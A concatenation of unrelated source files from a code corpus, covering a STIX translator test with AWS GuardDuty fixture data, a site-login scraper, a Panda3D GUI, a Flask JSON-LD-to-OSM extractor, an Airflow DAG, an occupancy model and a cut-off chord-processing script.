assert network_obj['type'] == 'network-traffic'
assert network_obj['dst_port'] == 38420
assert network_obj['src_ref'] == '3'
assert network_obj['dst_ref'] == '9'
assert network_obj['src_port'] == 22
assert network_obj['protocols'] == ['tcp']
def test_guardduty_custom_attr_json_to_stix(self):
"""to test network stix object properties"""
data = {
"guardduty": {
"accountid": 979326520502,
"region": "us-east-1",
"type": "UnauthorizedAccess:EC2/SSHBruteForce",
"resource_instancedetails_networkinterfaces_0_privatednsname": "ip-172-31-60-104.ec2.internal",
"resource_instancedetails_networkinterfaces_0_privateipaddress": "172.31.60.104",
"resource_instancedetails_networkinterfaces_0_subnetid": "subnet-ea9d6be4",
"resource_instancedetails_networkinterfaces_0_publicdnsname": "ec2-18-210-22-128.compute-1."
"amazonaws.com",
"resource_instancedetails_networkinterfaces_0_vpcid": "vpc-10db926a",
"resource_instancedetails_networkinterfaces_0_publicip": "172.16.31.10",
"resource_instancedetails_networkinterfaces_0_networkinterfaceid": "eni-0203098cca62c3f21",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupid": "sg-018edb43fcc81525f",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupname": "launch-wizard-13",
"resource_instancedetails_imageid": "ami-0015fcaa5516c75ed",
"resource_instancedetails_instanceid": "i-031cb81e1f32a36e1",
"resource_instancedetails_availabilityzone": "us-east-1f",
"service_eventfirstseen": "2020-07-31T06:19:09Z",
"service_action_networkconnectionaction_protocol": "TCP",
"service_action_networkconnectionaction_remoteportdetails_port": "38420",
"service_action_networkconnectionaction_remoteipdetails_country_countryname": "Sweden",
"service_action_networkconnectionaction_remoteipdetails_ipaddressv4": "172.16.31.10",
"service_action_networkconnectionaction_remoteipdetails_city_cityname": "rebro",
"service_action_networkconnectionaction_localportdetails_port": "22",
"service_eventlastseen": "2020-09-12T09:19:40Z",
"severity": 2,
"title": "172.16.31.10 is performing SSH brute force attacks against i-031cb81e1f32a36e1.",
"arn": "arn:aws:guardduty:us-east-1:979326520502:detector/6ab6e6ee780ed494f3b7ca56acdc74df/finding/"
"7ab9d1cb6248e05a0e419a79528761cb",
"createdat": "2020-07-31T06:37:13.745Z",
"description": "172.16.31.10 is performing SSH brute force attacks against i-031cb81e1f32a36e1."
" Brute force attacks are used to gain unauthorized access to your instance by guessing "
"the SSH password.",
"finding_id": "7ab9d1cb6248e05a0e419a79528761cb",
"partition": "aws",
"resource": {
"instancedetails": {
"imagedescription": "Provided by Red Hat, Inc.",
"instancestate": "running",
"instancetype": "t2.large",
"launchtime": "2020-09-11T23:16:03Z",
"tags": {
"0": {
"key": "Name",
"value": "ArcSight Logger"
}
}
},
"resourcetype": "Instance"
},
"schemaversion": 2.0,
"service": {
"action": {
"actiontype": "NETWORK_CONNECTION",
"networkconnectionaction": {
"connectiondirection": "INBOUND",
"localportdetails": {
"portname": "SSH"
},
"remoteipdetails": {
"geolocation": {
"lat": "59.2741",
"lon": "15.2066"
},
"organization": {
"asn": "2119",
"asnorg": "Telenor Norge AS",
"isp": "Telenor Sverige AB",
"org": "Telenor Sverige AB"
}
},
"remoteportdetails": {
"portname": "Unknown"
}
}
},
"count": "20",
"detectorid": "6ab6e6ee780ed494f3b7ca56acdc74df",
"resourcerole": "TARGET",
"servicename": "guardduty"
},
"updatedat": "2020-09-12T09:25:34.086Z"
}
}
options = {"unmapped_fallback": True}
result_bundle = json_to_stix_translator.convert_to_stix(
data_source, map_data, [data], get_module_transformers(MODULE), options)
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == data_source['type']
observed_data = result_bundle_objects[1]
assert 'objects' in observed_data
objects = observed_data['objects']
custom_object = TestAwsResultsToStix.get_first_of_type(objects.values(), 'x-aws-athena')
assert custom_object.keys() == {'type', 'service_action_networkconnectionaction_remoteipdetails_country_countryname',
'finding_id', 'arn', 'createdat', 'partition', 'resource',
'schemaversion', 'service', 'updatedat'}
assert custom_object['arn'] == 'arn:aws:guardduty:us-east-1:979326520502:detector/6ab6e6ee780ed' \
'494f3b7ca56acdc74df/finding/7ab9d1cb6248e05a0e419a79528761cb'
assert custom_object['finding_id'] == '7ab9d1cb6248e05a0e419a79528761cb'
assert custom_object['createdat'] == '2020-07-31T06:37:13.745Z'
assert custom_object['partition'] == 'aws'
assert custom_object['schemaversion'] == 2.0
assert custom_object['updatedat'] == '2020-09-12T09:25:34.086Z'
| 2.1875 | 2 |
Python Spider/xpath/03 login.py | CodingGorit/Coding-with-Python | 1 | 5078 | <filename>Python Spider/xpath/03 login.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
#file: 03 login.py
#@author: Gorit
#@contact: <EMAIL>
#@time: 2020/1/20 12:44
import requests
from lxml import etree
# Wrapper class: log in to lmonkey.com ("学习猿地") and fetch the user's orders
class lMonKey():
    # Login request URL
    loginUrl = "https://www.lmonkey.com/login"
    # Account center (orders) URL
    orderUrl = "https://www.lmonkey.com/my/order"
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3741.400 QQBrowser/10.5.3863.400"
}
    # Request session object
    req = None
    # CSRF token
    token = ''
    # Order number
    # Constructor
    def __init__(self):
        # Initialize the request session
        self.req = requests.session()
        if self.getlogin():  # GET of the login page succeeded
            if self.postlogin():  # POST login succeeded
                self.getordder()
    # GET the login page and extract _token
    def getlogin(self):
        # 1. GET the login page to set the session cookie and obtain _token
        res = self.req.get(url=self.loginUrl, headers=self.headers)
        if res.status_code == 200:
            print("GET of login page succeeded")
            html = etree.HTML(res.text)
            self.token = html.xpath("//input[@name='_token']/@value")[0]
            # Find the <input> tag whose name attribute is "_token" and read its value -- that is the token
            # input[@name='xxx'] selects the tag with the given attribute value
            print("token retrieved successfully")
            return True
        else:
            print("request failed")
    # POST the login form; the session keeps the resulting cookies
    def postlogin(self):
        uname = input("Enter your phone number: ")
        passw = input("Enter your password: ")
        data = {
            "_token": self.token,
            "username": uname,
            "password": passw
        }
        # Send the POST request
        res = self.req.post(url=self.loginUrl, headers=self.headers, data=data)
        if res.status_code == 200 or res.status_code == 302:
            print("login successful!!")
            return True
    def getordder(self):
        # Fetch the order page with a plain GET request and read the default order info
        # by parsing the returned document
        res = self.req.get(url=self.orderUrl, headers=self.headers)
        if res.status_code == 200:
            print("order page request succeeded")
            html = etree.HTML(res.text)
            # Parse the page
            r = html.xpath("//div[@class='avatar-content']/small/text()")
            print(r)
        else:
            print("order page request failed")
obj = lMonKey()
| 2.96875 | 3 |
src/gui/MultiplayerPlayerInfo.py | fireclawthefox/AnkandoraLight | 3 | 5079 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This file was created using the DirectGUI Designer
from direct.gui import DirectGuiGlobals as DGG
from direct.gui.DirectFrame import DirectFrame
from direct.gui.DirectLabel import DirectLabel
from direct.gui.DirectButton import DirectButton
from direct.gui.DirectOptionMenu import DirectOptionMenu
from panda3d.core import (
LPoint3f,
LVecBase3f,
LVecBase4f,
TextNode
)
class GUI:
def __init__(self, rootParent=None):
self.frmMain = DirectFrame(
frameColor=(1, 1, 1, 1),
frameSize=(-1.777778, 1.77777778, -1.1638, 1.1638),
hpr=LVecBase3f(0, 0, 0),
image='assets/menu/Background.png',
pos=LPoint3f(0, 0, 0),
image_scale=LVecBase3f(1.77778, 1, 1.1638),
image_pos=LPoint3f(0, 0, 0),
parent=rootParent,
)
self.frmMain.setTransparency(0)
self.frmSinglePlayerCreateGame = DirectFrame(
borderWidth=(0.01, 0.01),
frameColor=(1, 1, 1, 1),
frameSize=(-0.65, 0.65, -0.55, 0.55),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.425, 0, 0),
relief=5,
parent=self.frmMain,
)
self.frmSinglePlayerCreateGame.setTransparency(0)
self.pg703 = DirectLabel(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0, 0, 0.425),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Player Info',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.pg703.setTransparency(0)
self.pg13803 = DirectButton(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.35, 0, -0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Start',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
command=base.messenger.send,
extraArgs=["multiplayerPlayerInfo_start"],
)
self.pg13803.setTransparency(0)
self.pg5219 = DirectLabel(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.6, 0, 0.02),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Player Class',
text_align=TextNode.A_left,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.pg5219.setTransparency(0)
self.optionPlayerClass = DirectOptionMenu(
items=['item1'],
frameSize=(0.07500000298023224, 3.012500149011612, -0.11250001192092896, 0.75),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.2, 0, 0.005),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='item1',
cancelframe_frameSize=(-1, 1, -1, 1),
cancelframe_hpr=LVecBase3f(0, 0, 0),
cancelframe_pos=LPoint3f(0, 0, 0),
cancelframe_relief=None,
item_frameSize=(0.07500000298023224, 2.4125001430511475, -0.11250001192092896, 0.75),
item_hpr=LVecBase3f(0, 0, 0),
item_pos=LPoint3f(-0.075, 0, -0.75),
item_text='item1',
item0_text_align=TextNode.A_left,
item0_text_scale=(1, 1),
item0_text_pos=(0, 0),
item0_text_fg=LVecBase4f(0, 0, 0, 1),
item0_text_bg=LVecBase4f(0, 0, 0, 0),
item0_text_wordwrap=None,
popupMarker_frameSize=(-0.5, 0.5, -0.2, 0.2),
popupMarker_hpr=LVecBase3f(0, 0, 0),
popupMarker_pos=LPoint3f(2.7125, 0, 0.31875),
popupMarker_relief=2,
popupMarker_scale=LVecBase3f(0.4, 0.4, 0.4),
popupMenu_frameSize=(0, 2.3375001400709152, -0.862500011920929, 0),
popupMenu_hpr=LVecBase3f(0, 0, 0),
popupMenu_pos=LPoint3f(0, 0, 0),
popupMenu_relief='raised',
text_align=TextNode.A_left,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.optionPlayerClass.setTransparency(0)
self.btnCancel = DirectButton(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.325, 0, -0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Cancel',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
command=base.messenger.send,
extraArgs=["multiplayerPlayerInfo_cancel"],
)
self.btnCancel.setTransparency(0)
self.frmPlayerInfo = DirectFrame(
borderWidth=(0.01, 0.01),
frameColor=(1, 1, 1, 1),
frameSize=(-0.5, 0.5, -0.55, 0.55),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.765, 0, 0),
relief=3,
parent=self.frmMain,
)
self.frmPlayerInfo.setTransparency(0)
self.lblInfoHeader = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0, 0, 0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Info',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblInfoHeader.setTransparency(0)
self.frmImageHero = DirectFrame(
frameColor=(1, 1, 1, 1),
frameSize=(-0.15, 0.15, -0.2, 0.2),
hpr=LVecBase3f(0, 0, 0),
image='/home/fireclaw/workspace/Ankandora/AnkandoraLight/design/guiGraphics/heroArcher.png',
pos=LPoint3f(-0.275, 0, 0.195),
image_scale=LVecBase3f(0.15, 1, 0.2),
image_pos=LPoint3f(0, 0, 0),
parent=self.frmPlayerInfo,
)
self.frmImageHero.setTransparency(1)
self.lblClassDescription = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.12, 0, 0.31),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='The archer shoots from afar and gains the first-strike',
text_align=TextNode.A_left,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=10.0,
parent=self.frmPlayerInfo,
)
self.lblClassDescription.setTransparency(0)
self.lblHealth = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.28, 0, -0.1),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Health',
text_align=TextNode.A_center,
text_scale=(0.7, 0.7),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblHealth.setTransparency(0)
self.lblAttack = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.285),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Attack',
text_align=TextNode.A_center,
text_scale=(0.7, 0.7),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblAttack.setTransparency(0)
self.lblHealthValue = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.17),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='7',
text_align=TextNode.A_center,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblHealthValue.setTransparency(0)
self.lblAttackValue = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.36),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='4',
text_align=TextNode.A_center,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblAttackValue.setTransparency(0)
def show(self):
self.frmMain.show()
def hide(self):
self.frmMain.hide()
def destroy(self):
self.frmMain.destroy()
| 1.9375 | 2 |
publications/time_mag.py | mkoo21/rss-review-scraper | 0 | 5080 | from . import FROM_FEED_PUBLISHED_TODAY, STRINGIFY
def filter_by_tag(tag, entries):
matches = list(filter(
lambda x: any(list(map(
lambda y: y.term == tag,
x.tags
))),
entries
))
if len(matches) == 0:
return ""
return "<h2>TIME {} - {} results</h2>".format(tag, len(matches)) + \
"".join(list(map(lambda x: STRINGIFY(x, 'TIME'), matches)))
def TIME():
pub_today = FROM_FEED_PUBLISHED_TODAY('https://feeds2.feedburner.com/time/entertainment')
return filter_by_tag('movies', pub_today) + \
filter_by_tag('Television', pub_today)
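# Illustrative usage sketch (the caller below is an assumption; FROM_FEED_PUBLISHED_TODAY
# and STRINGIFY come from this package's __init__ as imported above):
#   html_block = TIME()
#   if html_block:
#       digest_sections.append(html_block)  # digest_sections is a hypothetical list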
| 2.78125 | 3 |
2020/21/code.py | irobin591/advent-of-code-2019 | 0 | 5081 | # Advent of Code 2020
# Day 21
# Author: irobin591
import os
import doctest
import re
re_entry = re.compile(r'^([a-z ]+) \(contains ([a-z, ]*)\)$')
with open(os.path.join(os.path.dirname(__file__), "input.txt"), 'r') as input_file:
input_data = input_file.read().strip().split('\n')
def part1(input_data):
"""
>>> part1(open(os.path.join(os.path.dirname(__file__), "test_part1.txt"), 'r').read().strip().split('\\n'))
5
"""
# dict['allergen'] = ['asdfa', 'agbsfb']
allergens = {}
ingredients = []
# map strings to allergens
for entry in input_data:
r = re_entry.match(entry)
if not r:
raise RuntimeError("")
contents = set(r.group(1).split(' '))
ingredients.extend(contents)
for allergen in r.group(2).split(', '):
if allergen not in allergens:
allergens[allergen] = contents
else:
# only keep already added ingredients
allergens[allergen] = [ingredient for ingredient in contents if ingredient in allergens[allergen]]
# print(allergens)
# print(ingredients)
ingredients_with_allergens = set([y for x in allergens.values() for y in x])
# print(list(filter(lambda i: i not in ingredients_with_allergens, ingredients)))
return len(list(filter(lambda i: i not in ingredients_with_allergens, ingredients)))
def part2(input_data):
"""
>>> part2(open(os.path.join(os.path.dirname(__file__), "test_part1.txt"), 'r').read().strip().split('\\n'))
'mxmxvkd,sqjhc,fvjkl'
"""
# dict['allergen'] = ['asdfa', 'agbsfb']
allergens = {}
ingredients = []
# map strings to allergens
for entry in input_data:
r = re_entry.match(entry)
if not r:
raise RuntimeError("")
contents = set(r.group(1).split(' '))
ingredients.extend(contents)
for allergen in r.group(2).split(', '):
if allergen not in allergens:
allergens[allergen] = list(contents)
else:
# only keep already added ingredients
allergens[allergen] = [ingredient for ingredient in contents if ingredient in allergens[allergen]]
# print(allergens)
# (allergen, ingredient)
assigned_allergens = []
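    # Elimination loop: repeatedly pick any allergen that has exactly one candidate
    # ingredient left, record the (allergen, ingredient) pair, and remove that
    # ingredient from every other allergen's candidate list until all lists are empty.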
while sum([len(ingreds) for ingreds in allergens.values()]) > 0:
for allergen in allergens:
if len(allergens[allergen]) == 1:
ingredient = allergens[allergen][0]
assigned_allergens.append((allergen, ingredient))
for allergen2 in allergens:
if ingredient in allergens[allergen2]:
allergens[allergen2].remove(ingredient)
assigned_allergens.sort(key=lambda x: x[0])
return ",".join([x[1] for x in assigned_allergens])
if __name__ == "__main__":
doctest.testmod()
print("Part One: {}".format(part1(input_data)))
print("Part Two: {}".format(part2(input_data)))
pass | 3.515625 | 4 |
tests/test_html_escaping.py | copart/pandoc-mustache | 43 | 5082 | """
Test that escaping characters for HTML is disabled.
"""
import os, subprocess
def test_escape_singlequote(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world ' universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world ' universe\n"
def test_escape_gt(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world > universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world > universe\n"
def test_escape_ampersand(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world & universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world & universe\n"
| 2.734375 | 3 |
app.py | iandees/microdata2osm | 1 | 5083 | from flask import Flask, jsonify, request
from w3lib.html import get_base_url
import extruct
import requests
app = Flask(__name__)
def extract_osm_tags(data):
tags = {}
schema_org_type = data.get('@type')
if schema_org_type == 'Restaurant':
tags['amenity'] = 'restaurant'
        # servesCuisine is a schema.org property of the entry, so read it from the
        # extracted data rather than from the OSM tags being built
        serves_cuisine = data.get('servesCuisine')
        if serves_cuisine:
            cuisine = []
            if 'Burgers' in serves_cuisine:
                cuisine.append('burger')
            if 'Fast Casual' in serves_cuisine:
                tags['amenity'] = 'fast_food'
            if cuisine:
                tags['cuisine'] = ';'.join(cuisine)
elif schema_org_type == 'Hotel':
tags['tourism'] = 'hotel'
elif schema_org_type == 'ExerciseGym':
tags['leisure'] = 'fitness_centre'
elif schema_org_type == 'BankOrCreditUnion':
tags['amenity'] = 'bank'
else:
return {}
address = data.get('address', {}).get('streetAddress')
if address:
tags['addr:full'] = address
address = data.get('address', {}).get('addressLocality')
if address:
tags['addr:city'] = address
address = data.get('address', {}).get('addressRegion')
if address:
tags['addr:state'] = address
address = data.get('address', {}).get('postalCode')
if address:
        tags['addr:postcode'] = address
address = data.get('address', {}).get('addressCountry')
if address:
tags['addr:country'] = address
brand = data.get('brand')
if brand:
tags['brand'] = brand
name = data.get('name')
if name:
tags['name'] = name
telephone = data.get('telephone')
if telephone:
tags['phone'] = telephone
faxNumber = data.get('faxNumber')
if faxNumber:
tags['fax'] = faxNumber
url = data.get('url')
if url:
tags['website'] = url
return tags
@app.route("/extract")
def extract():
url = request.args.get('url')
if not url:
return jsonify(error="Must specify url parameter"), 400
app.logger.info("Extracting json-ld from %s", url)
r = requests.get(url)
if r.status_code != 200:
app.logger.info("HTTP %s from %s", r.status_code, url)
return jsonify(error="Error fetching url"), 502
base_url = get_base_url(r.text, r.url)
data = extruct.extract(r.text, base_url=base_url, syntaxes=["json-ld"])
data = data.get('json-ld')
output = {}
suggested_tags = {}
for entry in data:
suggested_tags.update(extract_osm_tags(entry))
output = {
'status': {
'url': url,
'success': len(suggested_tags) > 0,
},
'suggested_tags': suggested_tags,
}
if request.args.get('include_extracted', type=bool):
output['extracted'] = data
return jsonify(output)
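# Illustrative request (host/port are assumptions for a local "flask run"):
#   curl 'http://127.0.0.1:5000/extract?url=https://example.com/&include_extracted=1'
# Any non-empty include_extracted value should add the raw json-ld to the response.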
| 2.609375 | 3 |
dags/simple_python_taskflow_api.py | davemasino/airflow101 | 0 | 5084 | """
A simple Python DAG using the Taskflow API.
"""
import logging
import time
from datetime import datetime
from airflow import DAG
from airflow.decorators import task
log = logging.getLogger(__name__)
with DAG(
dag_id='simple_python_taskflow_api',
schedule_interval=None,
start_date=datetime(2021, 1, 1),
catchup=False,
tags=['airflow101'],
) as dag:
@task(task_id="hello_message")
def say_hello():
"""Print a hello message"""
print("Hello, World!")
hello_task = say_hello()
@task(task_id="go_to_sleep")
def sleep_for_1():
"""Go to sleep"""
time.sleep(1)
sleeping_task = sleep_for_1()
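    # The ">>" operator wires the dependency: go_to_sleep only runs after
    # hello_message has finished.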
hello_task >> sleeping_task
| 3.046875 | 3 |
pyunmarked/roylenichols.py | kenkellner/pyunmarked | 0 | 5085 | from . import model
import numpy as np
from scipy import special, stats
class RoyleNicholsModel(model.UnmarkedModel):
def __init__(self, det_formula, abun_formula, data):
self.response = model.Response(data.y)
abun = model.Submodel("Abundance", "abun", abun_formula, np.exp, data.site_covs)
det = model.Submodel("Detection", "det", det_formula, special.expit, data.obs_covs)
self.submodels = model.SubmodelDict(abun=abun, det=det)
def negloglik(self, x, mod, K):
x = np.array(x)
beta_abun = x[mod["abun"].index]
beta_det = x[mod["det"].index]
y = mod.response.y
N, J = y.shape
lam = mod["abun"].predict(beta=beta_abun, interval=False)
r = mod["det"].predict(beta=beta_det, interval=False).reshape(N, J)
q = 1 - r
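        # Royle-Nichols marginal likelihood: for each site the latent abundance k is
        # summed out from Kmin to K, weighting the Bernoulli detection likelihood
        # (detection probability 1 - q**k) by the Poisson(k | lam) prior of that site.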
nll = 0.0
for i in range(N):
kvals = range(int(mod.response.Kmin[i]), int(K)+1)
f = stats.poisson.pmf(kvals, lam[i])
ymat = np.tile(y[i,], (len(kvals), 1))
qmat = np.tile(q[i,], (len(kvals), 1))
kmat = np.tile(kvals, (J, 1)).transpose()
pmat = 1 - qmat**kmat
g = stats.binom.logpmf(ymat, 1, pmat).sum(axis=1)
fg = f * np.exp(g)
nll -= np.log(fg.sum())
return nll
def simulate(self):
N, J = self.response.y.shape
lam = self.predict("abun", interval=False)
q = 1 - self.predict("det", interval=False).reshape(N, J)
z = np.random.poisson(lam, N)
zrep = np.tile(z, (J,1)).transpose()
p = 1 - q**zrep
y = np.empty((N, J))
for i in range(N):
y[i,] = np.random.binomial(1, p[i,], J)
return y
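# Minimal usage sketch (illustrative only; `data` is assumed to provide the y,
# site_covs and obs_covs attributes used by the constructor, and fitting/predict
# are inherited from the shared UnmarkedModel base class):
#   mod = RoyleNicholsModel("~1", "~1", data)
#   # ... fit via the base-class API, then draw replicate data:
#   y_sim = mod.simulate()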
| 2.296875 | 2 |
proc_chords_xarray.py | pgriewank/ASR_tools | 0 | 5086 | #Contains the functions needed to process both chords and regularized beards
# proc_chords is used for chords
#proc_beard_regularize for generating beards
#proc_pdf saves pdfs of a variable below cloud base
#Both have a large overlap, but I split them in two to keep any one script from getting too confusing.
import numpy as np
import math
from netCDF4 import Dataset
import os
import time as ttiimmee
from scipy.interpolate import interp1d
from scipy.interpolate import interp2d
#from scipy.interpolate import griddata
#from mpl_toolkits.axes_grid1 import make_axes_locatable
import pickle
import sys
#sys.path.insert(0, "/home/pgriewank/code/2019-chords-plumes/")
#from unionfind import UnionFind
from cusize_functions import *
#import matplotlib.pyplot as plt
import pandas as pd
import gc
import glob
import xarray as xr
#turned into a function
#removed the possibility to loop over multiple dates, if you want to do that call the function repeatedly
#Full list of variables to analyze is unclear, I will try to include everything available, but this might break the memory bank
#want to keep the automatic x and y calculation
#Scaling shouldn't be needed, as all chord properties should be independent of wind direction (right?)
#Similarly, no base definition is needed, all values are relative to cloud base
#Should be able to work for any variable in the column output, or for any 3D variable as long as it is named the same as the file.
#Changing 3D output
#Default is now to always go over x and y directions
#TODO
#plot_flag disabled for the time being
def proc_chords( date_str='20160611',
directory_input='/data/testbed/lasso/sims/',
directory_output='/data/testbed/lasso/chords/',
data_dim_flag=1,
base_percentile = 25,
special_name='',
chord_times = 0,
N_it_min=0,
N_it_max=1e9):
    # plot_curtains_flag: 0 nothing, 1 plots pre regularization plots, currently disabled
    # data_dim_flag: 1 = column, 3 = 3D snapshot
    # chord_times: 0 use Neil's values, 1 use values that fit the model output exactly with no gap possible
    # directory_input = '/data/testbed/lasso/sims/' #+date
    # N_it_max = maximum number of iterables, 3D timesteps or column files. Used for testing things quickly
    # N_it_min = start number of iterables, 3D timesteps or column files. Only really makes sense for 3D to avoid some weird initial fields.
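    # Illustrative call (paths and date are just the defaults / assumptions):
    #   proc_chords(date_str='20160611', data_dim_flag=3,
    #               directory_input='/data/testbed/lasso/sims/',
    #               directory_output='/data/testbed/lasso/chords/',
    #               N_it_max=10)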
time_begin = ttiimmee.time()
dz = 25.0 #39.0625 #should be overwritten after the profile data is loaded
dx = 25.0
date = date_str
n_percentiles = 7 #Number of percentiles
percentiles = np.array([5,10,35,50,65,90,95])
#1D clustering parameters in seconds, taken to agree with Lareau
if chord_times == 0:
t_gap = 20
t_min = 30
t_max = 1200*100 #Made a 100 times longer
cell_min = 3 #Minimal number of cells needed per chord
# #1D clustering parameters,
#set super strict, but goes on for a loooong time as well
if chord_times == 1:
t_gap = 0. #should be pretty strict, no gaps allowed!
t_min = 0.0
t_max = 1e9
cell_min = 3 #Minimal number of cells needed per chord
ql_min = 1e-5 #value used to determine existence of cloud
    z_min = 10 #Index of the minimum z level of the cbl
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*column*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
filename_qt = directory_input+date+'/qt.nc'
filename_thl = directory_input+date+'/thl.nc'
file_w = Dataset(filename_w,read='r')
file_ql = Dataset(filename_l,read='r')
file_thl = Dataset(filename_thl,read='r')
file_qt = Dataset(filename_qt,read='r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
filename_prof=glob.glob(directory_input+date+'/*default?0*.nc')[0]
#if date=='bomex':
